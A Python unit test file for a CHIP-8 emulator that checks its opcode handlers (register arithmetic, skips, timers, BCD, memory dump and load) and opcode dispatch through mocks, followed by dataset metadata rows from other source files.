self.emulator.registers[6] = int("98", HEX_SIZE)
self.emulator.opcode_if_equal(bytes.fromhex("3698"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_if_not_equal(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
self.emulator.registers[6] = int("98", HEX_SIZE)
self.emulator.opcode_if_not_equal(bytes.fromhex("3698"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite register value matching."
self.emulator.registers[6] = int("ff", HEX_SIZE)
self.emulator.opcode_if_not_equal(bytes.fromhex("3698"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_if_register_equal(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
self.emulator.registers[10] = int("11", HEX_SIZE)
self.emulator.registers[4] = int("12", HEX_SIZE)
self.emulator.opcode_if_register_equal(bytes.fromhex("5a40"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite register values matching."
self.emulator.registers[10] = int("40", HEX_SIZE)
self.emulator.registers[4] = int("40", HEX_SIZE)
self.emulator.opcode_if_register_equal(bytes.fromhex("5a40"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_set_register_value(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.opcode_set_register_value(bytes.fromhex("6133"))
for index, register in enumerate(self.emulator.registers):
if index == 1:
assert register == int("33", HEX_SIZE), "Register not set to correct value."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_add_value(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[11] = 10
self.emulator.opcode_add_value(bytes.fromhex("7b05"))
for index, register in enumerate(self.emulator.registers):
if index == 11:
assert register == 15, "Register addition failed."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.opcode_add_value(bytes.fromhex("7bfa"))
assert self.emulator.registers[11] == 9, "Register addition overflow did not work as expected."
assert self.emulator.registers[15] == 0, "Carry bit was set when it should not be modified by this instruction."
def test_opcode_set_register_value_other_register(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[8] = 47
self.emulator.opcode_set_register_value_other_register(bytes.fromhex("8480"))
for index, register in enumerate(self.emulator.registers):
if index == 4 or index == 8:
assert register == 47, "Register not set to correct value."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_set_register_bitwise_or(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 170
self.emulator.registers[8] = 85
self.emulator.opcode_set_register_bitwise_or(bytes.fromhex("8481"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 255, "Register not set to correct value."
elif index == 8:
assert register == 85, "Second register value was modified when it should not have been."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_set_register_bitwise_and(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 204
self.emulator.registers[8] = 170
self.emulator.opcode_set_register_bitwise_and(bytes.fromhex("8482"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 136, "Register not set to correct value."
elif index == 8:
assert register == 170, "Second register value was modified when it should not have been."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_set_register_bitwise_xor(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 204
self.emulator.registers[8] = 170
self.emulator.opcode_set_register_bitwise_xor(bytes.fromhex("8483"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 102, "Register not set to correct value."
elif index == 8:
assert register == 170, "Second register value was modified when it should not have been."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_add_other_register(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 200
self.emulator.registers[8] = 33
self.emulator.opcode_add_other_register(bytes.fromhex("8484"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 233, "Register not set to correct value."
elif index == 8:
assert register == 33, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 0, "Carry flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.opcode_add_other_register(bytes.fromhex("8484"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 10, "Register not set to correct value."
elif index == 8:
assert register == 33, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 1, "Carry flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_subtract_from_first_register(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 100
self.emulator.registers[8] = 70
self.emulator.opcode_subtract_from_first_register(bytes.fromhex("8485"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 30, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 1, "Not borrow flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.opcode_subtract_from_first_register(bytes.fromhex("8485"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 216, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 0, "Not borrow flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_bit_shift_right(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 85
self.emulator.registers[8] = 70
self.emulator.opcode_bit_shift_right(bytes.fromhex("8486"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 42, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 1, "Least significant bit was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.opcode_bit_shift_right(bytes.fromhex("8486"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 21, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 0, "Least significant bit was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_subtract_from_second_register(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 70
self.emulator.registers[8] = 100
self.emulator.opcode_subtract_from_second_register(bytes.fromhex("8487"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 30, "Register not set to correct value."
elif index == 8:
assert register == 100, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 1, "Not borrow flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.registers[8] = 10
self.emulator.opcode_subtract_from_second_register(bytes.fromhex("8487"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 236, "Register not set to correct value."
elif index == 8:
assert register == 10, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 0, "Not borrow flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_bit_shift_left(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 171
self.emulator.registers[8] = 70
self.emulator.opcode_bit_shift_left(bytes.fromhex("848e"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 86, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 1, "Most significant bit was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.opcode_bit_shift_left(bytes.fromhex("848e"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 172, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 0, "Most significant bit was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_if_register_not_equal(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
self.emulator.registers[10] = int("40", HEX_SIZE)
self.emulator.registers[4] = int("40", HEX_SIZE)
self.emulator.opcode_if_register_not_equal(bytes.fromhex("9a40"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite register values not matching."
self.emulator.registers[10] = int("11", HEX_SIZE)
self.emulator.registers[4] = int("12", HEX_SIZE)
self.emulator.opcode_if_register_not_equal(bytes.fromhex("9a40"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_set_register_i(self):
assert self.emulator.register_i == 0, "Register I starting at an unexpected value."
self.emulator.opcode_set_register_i(bytes.fromhex("a491"))
assert self.emulator.register_i == int("491", HEX_SIZE), "Register I set to the wrong value."
def test_opcode_goto_addition(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
self.emulator.registers[0] = 20
self.emulator.opcode_goto_addition(bytes.fromhex("b5b2"))
assert self.emulator.program_counter == int("5b2", HEX_SIZE) + 20, "Program counter incorrect after jump opcode."
def test_opcode_if_key_pressed(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
assert not self.emulator.keys[6], "Key press starting at an unexpected value."
self.emulator.registers[4] = 6
self.emulator.opcode_if_key_pressed(bytes.fromhex("e49e"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite key not pressed."
self.emulator.keys[6] = True
self.emulator.opcode_if_key_pressed(bytes.fromhex("e49e"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_if_key_not_pressed(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
assert not self.emulator.keys[6], "Key press starting at an unexpected value."
self.emulator.registers[4] = 6
self.emulator.keys[6] = True
self.emulator.opcode_if_key_not_pressed(bytes.fromhex("e4a1"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite key pressed."
self.emulator.keys[6] = False
self.emulator.opcode_if_key_not_pressed(bytes.fromhex("e4a1"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_get_delay_timer(self):
assert self.emulator.delay == 0, "Delay timer starting at an unexpected value."
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.delay = 55
self.emulator.opcode_get_delay_timer(bytes.fromhex("f307"))
for index, register in enumerate(self.emulator.registers):
if index == 3:
assert register == 55, "Register not set to correct value."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_set_delay_timer(self):
assert self.emulator.delay == 0, "Delay timer starting at an unexpected value."
self.emulator.registers[3] = 44
self.emulator.opcode_set_delay_timer(bytes.fromhex("f315"))
assert self.emulator.delay == 44, "Delay timer was not set correctly."
def test_opcode_set_sound_timer(self):
assert self.emulator.sound == 0, "Sound timer starting at an unexpected value."
self.emulator.registers[3] = 44
self.emulator.opcode_set_sound_timer(bytes.fromhex("f318"))
assert self.emulator.sound == 44, "Sound timer was not set correctly."
def test_opcode_register_i_addition(self):
self.emulator.register_i = 4050
self.emulator.registers[7] = 50
self.emulator.opcode_register_i_addition(bytes.fromhex("f71e"))
assert self.emulator.register_i == 4, "Register I set to the wrong value."
assert self.emulator.registers[7] == 50, "Value of register was changed when it was not the target of the addition."
assert self.emulator.registers[15] == 1, "Overflow flag was not set correctly."
self.emulator.opcode_register_i_addition(bytes.fromhex("f71e"))
assert self.emulator.register_i == 54, "Register I set to the wrong value."
assert self.emulator.registers[7] == 50, "Value of register was changed when it was not the target of the addition."
assert self.emulator.registers[15] == 0, "Overflow flag was not set correctly."
def test_opcode_set_register_i_to_hex_sprite_address(self):
assert self.emulator.register_i == 0
self.emulator.load_digit_sprites()
self.emulator.registers[4] = 11
self.emulator.opcode_set_register_i_to_hex_sprite_address(bytes.fromhex("f429"))
assert self.emulator.register_i == 55, "Register I was not set to the correct address for the given sprite."
assert self.emulator.ram[self.emulator.register_i] == int("e0", HEX_SIZE), "The first byte of the B sprite is incorrect."
assert self.emulator.ram[self.emulator.register_i + 1] == int("90", HEX_SIZE), "The second byte of the B sprite is incorrect."
assert self.emulator.ram[self.emulator.register_i + 2] == int("e0", HEX_SIZE), "The third byte of the B sprite is incorrect."
assert self.emulator.ram[self.emulator.register_i + 3] == int("90", HEX_SIZE), "The fourth byte of the B sprite is incorrect."
assert self.emulator.ram[self.emulator.register_i + 4] == int("e0", HEX_SIZE), "The fifth byte of the B sprite is incorrect."
def test_opcode_binary_coded_decimal(self):
for index, byte in enumerate(self.emulator.ram):
if index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Ram starting at an unexpected value."
self.emulator.register_i = 3123
self.emulator.registers[12] = 135
self.emulator.opcode_binary_coded_decimal(bytes.fromhex("fc33"))
assert self.emulator.register_i == 3123, "Register I was modified when it should be left untouched."
for index, byte in enumerate(self.emulator.ram):
if index == 3123:
assert byte == 1, "Hundreds digit set to the incorrect value."
elif index == 3124:
assert byte == 3, "Tens digit set to the incorrect value."
elif index == 3125:
assert byte == 5, "Units digit set to the incorrect value."
elif index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Non-targeted ram address was changed when it shouldn't have been."
self.emulator.registers[12] = 68
self.emulator.opcode_binary_coded_decimal(bytes.fromhex("fc33"))
assert self.emulator.register_i == 3123, "Register I was modified when it should be left untouched."
for index, byte in enumerate(self.emulator.ram):
if index == 3123:
assert byte == 0, "Hundreds digit set to the incorrect value."
elif index == 3124:
assert byte == 6, "Tens digit set to the incorrect value."
elif index == 3125:
assert byte == 8, "Units digit set to the incorrect value."
elif index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Non-targeted ram address was changed when it shouldn't have been."
self.emulator.registers[12] = 5
self.emulator.opcode_binary_coded_decimal(bytes.fromhex("fc33"))
assert self.emulator.register_i == 3123, "Register I was modified when it should be left untouched."
for index, byte in enumerate(self.emulator.ram):
if index == 3123:
assert byte == 0, "Hundreds digit set to the incorrect value."
elif index == 3124:
assert byte == 0, "Tens digit set to the incorrect value."
elif index == 3125:
assert byte == 5, "Units digit set to the incorrect value."
elif index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Non-targeted ram address was changed when it shouldn't have been."
def test_opcode_register_dump(self):
for index, byte in enumerate(self.emulator.ram):
if index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Ram starting at an unexpected value."
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
last_register = 12
self.emulator.register_i = 2000
for register in range(last_register + 1):
self.emulator.registers[register] = (register + 1) * 10
self.emulator.opcode_register_dump(bytes.fromhex("fc55"))
assert self.emulator.register_i == 2000, "Register I was modified when it should be left untouched."
for index, register in enumerate(self.emulator.registers):
if index < last_register + 1:
assert register == (index + 1) * 10, "Register value was modified by dump."
else:
assert register == 0, "Non-targeted register was modified."
for index, byte in enumerate(self.emulator.ram):
if self.emulator.register_i <= index <= self.emulator.register_i + last_register:
assert byte == (index - self.emulator.register_i + 1) * 10, "Register was not dumped correctly."
elif index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Non-targeted memory address was modified."
def test_opcode_register_load(self):
for index, byte in enumerate(self.emulator.ram):
if index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Ram starting at an unexpected value."
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
last_register = 12
self.emulator.register_i = 2000
for byte in range(last_register + 1):
self.emulator.ram[self.emulator.register_i + byte] = (byte + 1) * 10
self.emulator.opcode_register_load(bytes.fromhex("fc65"))
assert self.emulator.register_i == 2000, "Register I was modified when it should be left untouched."
for index, register in enumerate(self.emulator.registers):
if index < last_register + 1:
assert register == (index + 1) * 10, "Register value was not loaded correctly"
else:
assert register == 0, "Non-targeted register was modified."
for index, byte in enumerate(self.emulator.ram):
if self.emulator.register_i <= index <= self.emulator.register_i + last_register:
assert byte == (index - self.emulator.register_i + 1) * 10, "Ram was modified by the load."
elif index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Non-targeted memory address was modified."
class TestOpcodeRouting:
@classmethod
def setup_class(cls):
cls.emulator = Emulator()
def run_opcode(self, opcode: bytes, bad_opcode: bytes, mock_method: mock.patch.object):
self.emulator.run_opcode(bad_opcode)
mock_method.assert_not_called()
self.emulator.run_opcode(opcode)
mock_method.assert_called_with(opcode)
@mock.patch.object(Emulator, "opcode_call_subroutine")
def test_call_machine_code_routine(self, mock_method):
opcode = bytes.fromhex("0d52")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_clear_screen")
def test_clear_screen(self, mock_method):
opcode = bytes.fromhex("00e0")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_return_from_subroutine")
def test_return_from_subroutine(self, mock_method):
opcode = bytes.fromhex("00ee")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_goto")
def test_goto(self, mock_method):
opcode = bytes.fromhex("132a")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_call_subroutine")
def test_call_subroutine(self, mock_method):
opcode = bytes.fromhex("232a")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_equal")
def test_if_equal(self, mock_method):
opcode = bytes.fromhex("332a")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_not_equal")
def test_if_not_equal(self, mock_method):
opcode = bytes.fromhex("432a")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_register_equal")
def test_if_register_equal(self, mock_method):
opcode = bytes.fromhex("5320")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_value")
def test_set_register_value(self, mock_method):
opcode = bytes.fromhex("6133")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_add_value")
def test_add_value(self, mock_method):
opcode = bytes.fromhex("7433")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_return_from_subroutine")
def test_return_from_subroutine(self, mock_method):
opcode = bytes.fromhex("00EE")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_value_other_register")
def test_set_register_value_other_register(self, mock_method):
opcode = bytes.fromhex("8480")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_bitwise_or")
def test_set_register_bitwise_or(self, mock_method):
opcode = bytes.fromhex("8481")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_bitwise_and")
def test_set_register_bitwise_and(self, mock_method):
opcode = bytes.fromhex("8482")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_bitwise_xor")
def test_set_register_bitwise_xor(self, mock_method):
opcode = bytes.fromhex("8483")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_add_other_register")
def test_add_other_register(self, mock_method):
opcode = bytes.fromhex("8484")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_subtract_from_first_register")
def test_subtract_from_first_register(self, mock_method):
opcode = bytes.fromhex("8485")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_bit_shift_right")
def test_bit_shift_right(self, mock_method):
opcode = bytes.fromhex("8486")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_subtract_from_second_register")
def test_subtract_from_second_register(self, mock_method):
opcode = bytes.fromhex("8487")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_bit_shift_left")
def test_bit_shift_left(self, mock_method):
opcode = bytes.fromhex("848e")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_register_not_equal")
def test_if_register_not_equal(self, mock_method):
opcode = bytes.fromhex("9320")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_i")
def test_set_register_i(self, mock_method):
opcode = bytes.fromhex("a841")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_goto_addition")
def test_goto_addition(self, mock_method):
opcode = bytes.fromhex("b5b2")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_random_bitwise_and")
def test_random_bitwise_and(self, mock_method):
opcode = bytes.fromhex("c499")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_draw_sprite")
def test_draw_sprite(self, mock_method):
opcode = bytes.fromhex("d458")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_key_pressed")
def test_if_key_pressed(self, mock_method):
opcode = bytes.fromhex("e49e")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_key_not_pressed")
def test_if_key_not_pressed(self, mock_method):
opcode = bytes.fromhex("e4a1")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_get_delay_timer")
def test_get_delay_timer(self, mock_method):
opcode = bytes.fromhex("f307")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_wait_for_key_press")
def test_wait_for_key_press(self, mock_method):
opcode = bytes.fromhex("f90a")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_delay_timer")
def test_set_delay_timer(self, mock_method):
opcode = bytes.fromhex("f315")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_sound_timer")
def test_set_sound_timer(self, mock_method):
opcode = bytes.fromhex("f318")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_register_i_addition")
def test_register_i_addition(self, mock_method):
opcode = bytes.fromhex("f71e")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_i_to_hex_sprite_address")
def test_set_register_i_to_hex_sprite_address(self, mock_method):
opcode = bytes.fromhex("f029")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_binary_coded_decimal")
def test_binary_coded_decimal(self, mock_method):
opcode = bytes.fromhex("fc33")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_register_dump")
def test_register_dump(self, mock_method):
opcode = bytes.fromhex("fc55")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_register_load")
def test_register_load(self, mock_method):
opcode = bytes.fromhex("fc65")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
| 53.024548 | 147 | 0.671036 | 5,362 | 41,041 | 4.965684 | 0.05856 | 0.114475 | 0.054759 | 0.026403 | 0.905543 | 0.87208 | 0.833171 | 0.783783 | 0.746301 | 0.734508 | 0 | 0.030914 | 0.230745 | 41,041 | 773 | 148 | 53.093144 | 0.812454 | 0 | 0 | 0.541796 | 0 | 0 | 0.248434 | 0.017763 | 0 | 0 | 0 | 0 | 0.291022 | 1 | 0.114551 | false | 0 | 0.003096 | 0 | 0.122291 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5ed5a5c82ad51479c45178ad825d3820e76cc579 | 42 | py | Python | python/desc/skycatalogs/readers/__init__.py | JoanneBogart/skyCatalogs | dbfec210dcf926cc85be5ddd6048bbaf1e39cf97 | [
"BSD-3-Clause"
] | null | null | null | python/desc/skycatalogs/readers/__init__.py | JoanneBogart/skyCatalogs | dbfec210dcf926cc85be5ddd6048bbaf1e39cf97 | [
"BSD-3-Clause"
] | 4 | 2021-06-25T00:45:54.000Z | 2021-07-26T21:41:02.000Z | python/desc/skycatalogs/readers/__init__.py | JoanneBogart/skyCatalogs | dbfec210dcf926cc85be5ddd6048bbaf1e39cf97 | [
"BSD-3-Clause"
] | 1 | 2021-09-30T21:53:13.000Z | 2021-09-30T21:53:13.000Z | from .parquet_reader import ParquetReader
| 21 | 41 | 0.880952 | 5 | 42 | 7.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 1 | 42 | 42 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0d5a61ee4f41eaa912a700753bf1b39afa68ae79 | 61 | py | Python | nixml/languages/__init__.py | moredhel/nixml | 2c3d2a836d7a0060371597b8e95edf2b74af6018 | [
"MIT"
] | 58 | 2019-03-12T16:51:11.000Z | 2022-02-08T23:26:19.000Z | nixml/languages/__init__.py | moredhel/nixml | 2c3d2a836d7a0060371597b8e95edf2b74af6018 | [
"MIT"
] | 1 | 2020-03-13T05:37:01.000Z | 2020-03-13T09:21:06.000Z | nixml/languages/__init__.py | moredhel/nixml | 2c3d2a836d7a0060371597b8e95edf2b74af6018 | [
"MIT"
] | 4 | 2019-07-31T17:07:59.000Z | 2022-03-14T11:19:57.000Z | from . import python
from . import texlive
from . import nix
| 15.25 | 21 | 0.754098 | 9 | 61 | 5.111111 | 0.555556 | 0.652174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196721 | 61 | 3 | 22 | 20.333333 | 0.938776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0d7c1abb26b4ae8372494acb8e30dfe5654747a3 | 116 | py | Python | torchviz/__init__.py | marvosyntactical/pytorchviz | d69f9e2029b10cf9758dc4e2a5acd4b937b5dc14 | [
"MIT"
] | null | null | null | torchviz/__init__.py | marvosyntactical/pytorchviz | d69f9e2029b10cf9758dc4e2a5acd4b937b5dc14 | [
"MIT"
] | null | null | null | torchviz/__init__.py | marvosyntactical/pytorchviz | d69f9e2029b10cf9758dc4e2a5acd4b937b5dc14 | [
"MIT"
] | null | null | null | from .dot import make_dot, make_dot_from_trace, make_dot_blitz, save_ridge_gauss
from .histogram import HistManager
| 38.666667 | 80 | 0.862069 | 19 | 116 | 4.842105 | 0.578947 | 0.228261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094828 | 116 | 2 | 81 | 58 | 0.87619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
217217fab29428a0a7a9badd47939e6a32e95c47 | 32 | py | Python | hello.py | AryannaD/MB215-Lab1 | e507dd8f49a0a0953a57189acdba9452998317fa | [
"MIT"
] | null | null | null | hello.py | AryannaD/MB215-Lab1 | e507dd8f49a0a0953a57189acdba9452998317fa | [
"MIT"
